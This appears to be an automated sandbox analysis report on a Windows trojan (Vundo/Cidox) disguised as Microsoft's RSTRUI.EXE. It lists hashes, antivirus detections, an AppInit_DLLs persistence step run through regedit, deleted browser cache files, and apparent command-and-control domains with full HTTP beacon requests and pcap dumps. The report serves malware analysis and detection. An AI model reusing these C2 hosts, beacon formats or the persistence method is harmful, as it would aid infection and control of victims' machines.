Analysis Date2014-10-31 16:14:12
MD533a8f404432335d3564e071bf925ee1c
SHA1ab93199b1576ece9b13efe2fb9a9cc8db555d76f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a9203a1cc01f9b0f484624acacfdc942 sha1: 6f41d4c06bd740cc857107a74c1592da3e5ccbf9 size: 91648
Section_ASM2 md5: 5cbdb671cc3cd9b028945704dfb18263 sha1: 2c7f4695add5826a76301516006fca2d6cf0a3f4 size: 63488
Section.rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section.data md5: 1695711b55e0545e6ce1f490e5461ba9 sha1: 23a499463667bfda6e2f52b56f4fa651be33479f size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp2012-09-25 02:26:21
VersionLegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
PackerMicrosoft Visual C++ ?.?
PEhashed7168502630d6f765608bf68788c6f93aa2bee5
IMPhash11c52178b812c23b7febf02fc8e99619
AV360 SafeGen:Variant.Kazy.211341
AVAd-AwareGen:Variant.Kazy.211341
AVAlwil (avast)Vundo-XF [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen7
AVBullGuardGen:Variant.Kazy.211341
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVWin.Trojan.Cidox-121
AVDr. WebTrojan.Mayachok.17986
AVEmsisoftGen:Variant.Kazy.211341
AVEset (nod32)Win32/Kryptik.AMFU
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Kazy.211341
AVGrisoft (avg)Generic_r.BGN
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Backdoor ( 04c4f2bf1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.FakeMS.ED
AVMcafeeVundo-FASV!33A8F4044323
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Kazy.211341
AVNormanGen:Variant.Kazy.211341
AVRisingTrojan.Win32.Generic.1349AE9B
AVSophosMal/Vundo-M
AVSymantecTrojan.Zatvex!gen6
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)Backdoor.Cidox

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\dauaakj.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNS91.220.35.154
Winsock DNSterrans.su
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSverzinla.com
Winsock DNSgetintsu.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSveriolana.com
Winsock DNSinzavora.com
Winsock DNSodobvare.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\dauaakj.dll\\x00

Network Details:

DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
141.8.225.80
DNSfescheck.com
Type: A
209.222.14.3
DNSinzavora.com
Type: A
141.8.225.80
DNSdenadb.com
Type: A
204.11.56.26
DNSforadns.com
Type: A
209.222.14.3
DNSveriolana.com
Type: A
DNSverzinla.com\032
Type: A
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSodobvare.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUX3J49FLC6Zz
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURz7+qiRh4pJ
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURRF51nwD1/z
User-Agent:
HTTP GEThttp://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUeY4cMHbVW5i
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUQ0bnSPKR2xz
User-Agent:
HTTP GEThttp://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUZy5Ea2PjIuA
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 204.11.56.26:80
Flows TCP192.168.1.1:1037 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1038 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785566 44437778 3833356a 53552048   UxUfDCwx835jSU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   6574696e 7473752e 636f6d0d 0a0d0a     etintsu.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785558 334a3439 464c4336 5a7a2048   UxUX3J49FLC6Zz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785552 7a372b71 69526834 704a2048   UxURz7+qiRh4pJ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785552 52463531 6e774431 2f7a2048   UxURRF51nwD1/z H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785566 44437778 3833356a 53552048   UxUfDCwx835jSU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2069   TTP/1.1..Host: i
0x000000e0 (00224)   6e7a6176 6f72612e 636f6d0d 0a0d0a0a   nzavora.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785565 5934634d 48625657 35692048   UxUeY4cMHbVW5i H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0d0a0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785551 30626e53 504b5232 787a2048   UxUQ0bnSPKR2xz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0a0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   5578555a 79354561 32506a49 75412048   UxUZy5Ea2PjIuA H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3232 302e3335 2e313534 0d0a0d0a   1.220.35.154....
0x000000f0 (00240)                                         


Strings
P.
.
.3..w
.jyY}..uriVttcetorla
\
.CC
 
.N. .
E
uri
041904B0
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
333f3
5.1.2600.5512
5.1.2600.5512 (xpsp.080413-2108)
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
f3fff
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
 Microsoft
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
RSTRUI.EXE
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
 Windows
                          
{,0.+0q 
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
0trueM
1.CQx(1
1eX&.&
 1@]z1	\
2DU}|r
	"2`EtV
2hcF6n
2nrst]
$#)39W
3aotsg
3DJTZ,sTZ
3[Heef}
3u'xI#
3UYjVff
4:(3|?
43DqG/
4`8R8su
5(g'S|
.5ps25
5RoX0{j
6bWnga k
6BXpteS
6;jkvgfkJ{
^!))6z
7WnyuZ
7zO}qk
8;7780
)`@8@8
8EEMM<
8EHUXQ
&8LkQL
]@]8oE[
a>18R0
a,2<B_
'A5:TQ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
ADVAPI32.DLL
AdviseInUserModeA
aIvNZR
AkgM n
An application has made an attempt to load the C runtime library incorrectly.
>anqybnq~
=APAWG
/apral
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
aVGq4b
AWhk>h
BeginPaint
b`jVMUj
\BLR?a
bp@FoA
	bQrV%
bRUQZK(
bXeud}
C@ @ 7s@ @ 
cb"cpm
CcoWoG
ChBRjs
ci7$CISY
CIFQlSlR~
c$L@M0
CloseHandle
CorExitProcess
CoTaskMemAlloc
CreateBitmap
CreateSolidBrush
CreateWindowExA
- CRT not initialized
@.data
DateTime:%04d.%02d:%d
DDDDDC
DDDDDDDDDD
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DestroyWindow
deu3lhIi,Mr)
DeviceIoControl
^df*j"
Di6yGW
DispatchMessageA
DOMAIN error
DrawTextA
DTeiej
Dv)UArSay
D |x>)ZW
E2hJeelsP
eegt4)
eFa!"4%
eiJ!6=
eile~r
em1Ub[
EncodePointer
EndPaint
EnterCriticalSection
{eoao^
err3w)trr0o
ExitProcess
February
fek?{M
FindResourceA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
f!V_v1
gC    
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
G@jji'
gnrp)v
GpKFsq
<]|GQn	\
g[V'1'
h9,B,B4
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
heF1.ttloM
hF`Y>.
HH:mm:ss
hrpYg2[.
hsXBBhB]
_Hu2,R
h	wnKg
   HX	
HY>O[*
:I2~pn-
+i5&n.LA1
IDDu"c{h!
i isb]
IL"YWii 
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
ItrmGOv
iWfm72ei
+J3G/t
JanFebMarAprMayJunJulAugSepOctNovDec
January
JavaStudioClass
jBk1PY
jCos $#eLiai
j@Eh@h
j@j ^V
(,JW6h"
KERNEL32.dll
K;|euF
@kGZn]~
k|oNZ	h
L /0?t
l4g2q&k
L}69c%c>
lBSEaY
Lc0Zzon
LCMapStringA
LCMapStringW
LeA2dM
LeaveCriticalSection
?(LEj9
lFlF0j
lGplru
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadIconW
LoadLibraryA
LoadResource
LoadStringA
LockResource
lstrcmpiA
mdAyd,
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
MS]c5Z}tna{<t
MultiByteToWideChar
M<X&$W
n"@!@!
~    N
' N/0o
N!1o'5
n9t<H%
nes%dc
nevpXqB
nng9	lanrgS0
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
^npduK
NVPV<=(
Nyntc$[CD
o2lp=Lroeeq0bLLb
October
o,Er)oa
ole32.dll
~}ollr)
o^L%\T
OngBeVso
*oo| f
OstDQiotLX3lee
ot~#ilslafl
Ouuuu@
$'"!P&Dv
Pf ltlRGi
>__ PiA$T
Please contact the application's support team for more information.
pMcj8JuD
PPPPPPPP
Program: 
<program name unknown>
=P_]tE
- pure virtual function call
(PV`f>
'*PyGJWZ
q'<BKe
qeaEca
Q_\|pq
qQ[=^c
QueryPerformanceCounter
[r:}^}
r2U/LP
R4#{HTj
>!rant
rAtetYE.H
`.rdata
rea5p.0215
Rectangle
RegConnectRegistryA
RegisterClassExA
reny-/
rIsmC{t
rMCR)Ngexe?*
rrdr~zoee
|@@rt@
RtlUnwind
rTor(]eieK
runtime error 
Runtime Error!
s5rs\EC0io
Saturday
scm32.dll
September
SetFilePointer
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
S$/H?D3T_
ShowWindow
SING error
@ skyHJocnaQ
:]SlG^
snelvLbvsllYIoae}
^soda$
~SQtg9
S$R4Q%
strcat
Sunday
SunMonTueWedThuFriSat
SX),FE
s;ZiKd
==taju]
tAOitYDtHoyHo
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
tiiin|eP9i
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tluNi_
tlWttPFs
tMaT/L
TranslateAcceleratorA
TranslateMessage
TrC1i{
t"SS9]
t$<"u	3
Tuesday
;t$,v-
Tvh@:$
tv mkw*=EoPg
t+WWVPV
tx0bgF
t}(yiCF
:U	0K`c
%_uag@Wk
uAnl?LgV0l^wGcP
UEngGu
UE}u%3j
u`j^mkE
u-|ltdo
ULX6^+
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UN=I0|d
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
UW('=u
;U[x=$%
Vihnu0
VirtualAlloc
VirtualFree
vM6=1%
v	N+D$
`vtvd!' 
;vu]hF
W24Yu7
|"w	5Hi^
wB5Gz\
Wednesday
WideCharToMultiByte
WriteFile
`WsniW
wsprintfA
wtDDDDDDDC
Wt	j~^
Wu ^xz
wwwws0
wwwwwwws
wwwwwwww?
wwwwwwwws
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwwwz
wwwwwwwwwwwwwz
wwwwwwwwwwwwwzwwww
wwwwwwwwzww
wwwwwwwxx
wwwwwwwz
